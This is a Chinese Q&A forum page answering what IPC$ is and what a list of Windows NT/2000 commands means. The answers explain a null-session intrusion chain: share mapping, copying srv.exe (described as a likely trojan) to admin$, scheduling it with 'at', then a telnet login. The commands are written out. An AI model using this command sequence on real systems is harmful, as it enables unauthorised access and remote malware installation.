ipc是什么?还有下面这些参数代表什么意思?
发布网友
发布时间:2022-05-01 18:24
共3个回答
热心网友
时间:2022-06-21 04:02
第一句是跟192.168.200.1建IPC空连接
第二句是显示这台远程机器的主机名
第三、四句是连接远程机器的C盘共享
第五句是把srv.exe这个文件拷到远程机器的C:\windows\下
第六句是显示远程机器的时间
第七句是在远程机器上建立计划任务,13:14运行刚才拷的srv.exe这个文件
第八句是用telnet远程登录,不过你的这个写的有问题,数字有五组,是不是输错了?和前面的地址也不一样。
至于那个srv.exe可能是个木马服务端文件。
热心网友
时间:2022-06-21 04:03
网上关于 ipc$ 入侵的文章可谓多如牛毛,攻击步骤甚至已经成为了固化的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。不过话虽这样说,我认为这些文章讲解的并不详细,一些内容甚至是错误的,以致对 ipc$ 的提问几乎占了各大安全论坛讨论区的半壁江山,而且这些问题常常都是重复的,严重影响了论坛质量和学习效率,因此我总结了这篇文章,希望能把 ipc$ 这部分东西尽量说清楚。
注意:本文所讨论的各种情况均默认发生在 win NT/2000 环境下, win98 将不在此次讨论之列。
[编辑本段]二 什么是 ipc$
IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 IPC$ 是 NT/2000 的一项新功能,它有一个特点,即在同一时间内,两个 IP 之间只允许建立一个连接。 NT/2000 在提供了 ipc$ 功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享 (c$,d$,e$ …… ) 和系统目录 winnt 或 windows(admin$) 共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
平时我们总能听到有人在说 ipc$ 漏洞, ipc$ 漏洞,其实 ipc$ 并不是一个真正意义上的漏洞 , 我想之所以有人这么说,一定是指微软自己安置的那个‘后门':空会话( Null session )。那么什么是空会话呢?
参考资料:http://ke.baidu.com/view/528303.htm
热心网友
时间:2022-06-21 04:03
/////////////////////////////////////////
net use \192.168.200.1\ipc$ /user: 以user用户登陆192.168.200.1 建立空链接
nbtstat -A
例如:nbtstat -a 192.168.0.92
返回:
本地连接:
ode IpAddress: [192.168.0.2] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
ZHANGMIN <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
ZHANGMIN <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered
MAC Address = 00-1B-FC-06-85-28
//////////////////////////////////////////////////////
net use z: \\192.168.200.1\c$ /user:
net use z: \\192.168.200.1\c$
是磁盘映射
////////////////////////////////////////////
copy srv.exe \\192.168.200.1\admin$
复制文件
////////////////////////////////////////////////////////
net time \192.168.200.1 时间同步
at \\192.168.200.1 13:14 srv.exe 定时执行程序
telnet 192.168.200.1.99 telnet登陆
